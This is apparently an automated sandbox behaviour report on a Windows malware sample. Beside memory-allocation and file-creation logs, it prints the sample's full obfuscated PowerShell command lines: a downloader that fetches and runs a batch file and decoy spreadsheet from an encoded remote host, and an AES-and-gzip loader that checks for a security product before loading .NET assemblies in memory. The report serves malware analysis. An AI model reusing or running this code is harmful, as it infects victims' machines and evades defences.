NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2668 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\111.xlsx
file	C:\Users\test22\AppData\Roaming\~$111.xlsx

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk
file	C:\Users\test22\AppData\Roaming\xD.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK

Creates hidden or system file (3 events)

Time & API	Arguments	Status	Return
NtCreateFile May 9, 2024, 11 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000043c filepath: C:\Users\test22\AppData\Roaming\~$111.xlsx desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Roaming\~$111.xlsx create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0
SetFileAttributesW May 9, 2024, 11 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat	1	1
SetFileAttributesW May 9, 2024, 11 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat	1	1

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\111.xlsx.LNK
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk

Creates a suspicious process (5 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
cmdline	powershell.exe -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv;
cmdline	C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 9, 2024, 11 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function kipZYBt($xmlqoFv, $xxsHcHd){[IO.File]::WriteAllBytes($xmlqoFv, $xxsHcHd)};function NPYJHZhbRkH($xmlqoFv){if($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79358,79366,79366))) -eq $True){rundll32.exe $xmlqoFv }elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79370,79373,79307))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xmlqoFv}elseif($xmlqoFv.EndsWith((pUumXNaJPCwzbRJPTm @(79304,79367,79373,79363))) -eq $True){misexec /qn /i $xmlqoFv}else{Start-Process $xmlqoFv}};function skhhUWSRQRcMVVBi($zlBKZfgSrbR){$PwsxJOpZzZHAXU = New-Object (pUumXNaJPCwzbRJPTm @(79336,79359,79374,79304,79345,79359,79356,79325,79366,79363,79359,79368,79374));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$xxsHcHd = $PwsxJOpZzZHAXU.DownloadData($zlBKZfgSrbR);return $xxsHcHd};function pUumXNaJPCwzbRJPTm($FwJhDg){$bytRYOIMN=79258;$DOqsFCU=$Null;foreach($YTSyfwBIrldqUiXl in $FwJhDg){$DOqsFCU+=[char]($YTSyfwBIrldqUiXl-$bytRYOIMN)};return $DOqsFCU};function nvpRDaZuFdMv(){$LQHSRlYpPFAf = $env:AppData + '\';$OKCfUavrMyur = $LQHSRlYpPFAf + '111.xlsx';If(Test-Path -Path $OKCfUavrMyur){Invoke-Item $OKCfUavrMyur;}Else{ $USAlJnkhPi = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79307,79307,79307,79304,79378,79366,79373,79378));kipZYBt $OKCfUavrMyur $USAlJnkhPi;Invoke-Item $OKCfUavrMyur;};$wYVYeSi = $LQHSRlYpPFAf + 'xD.bat'; if (Test-Path -Path $wYVYeSi){NPYJHZhbRkH $wYVYeSi;}Else{ $dKcnJdV = skhhUWSRQRcMVVBi (pUumXNaJPCwzbRJPTm @(79362,79374,79374,79370,79316,79305,79305,79307,79315,79309,79304,79308,79308,79308,79304,79315,79312,79304,79307,79308,79310,79316,79313,79308,79314,79313,79305,79378,79326,79304,79356,79355,79374));kipZYBt $wYVYeSi $dKcnJdV;NPYJHZhbRkH $wYVYeSi;};;;;}nvpRDaZuFdMv; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 9, 2024, 11 a.m.	process_identifier: 2576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 9, 2024, 11 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	HTTP/1.1 200 OK
Data received	Content-Length: 9893 Content-Type: application/octet-stream Connection:close PK!bîh^[Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-JÜ²@5íÇQ>ÀÄÆªc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__fq·ÃR4DáAJ¬h>ãÚÇVßÆ¹ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿\|\\|z¿(ôPúº6h_-[@!ÒØPk´2nÏ}Ä?£LËðÂ Ýû%áÄßdºdN"m,à¥ÇDO97~§ÈÉ¸8ÀOíc\|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þÿÿPK!µU0#ôL_rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~IÜµ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu&rFq¬áÄvÕõÕöGJy(v½«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏ×¦é ?9LìÒÈsbgÙ®\|Èl!õùUSh9i°br:"y_dlÀóD¿ý\|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 Ã«ÈðÉ¨ÞÿÿPK!µñ ÍùÑxl/workbook.xml¬UÛn£0}_iÿù w5©j#uWU¯/V8Á `Ö6Mªªÿ¾cé%/ÝvøÂã33ÇÃéÙ®,$ãÕá´JyÆªõÝÞ!2¤"UF ^Ñ!z¤¾;Ýr±Yr¾1 C+UÇ%ÓDðV`YqQS±¶d-(ÉdN©Ë±mß* «P`ðÕ¥4áiSÒJu D}³Zöheú¸MS)/kX²©ÇeÏ×dYÛ;ì;·¶¡qúÀt´UÉRÁ%_©¶:ÒGþcÛÂøMvÇ1øk úÀt¬ÿIVþËÃöÑ0H«ÕJ
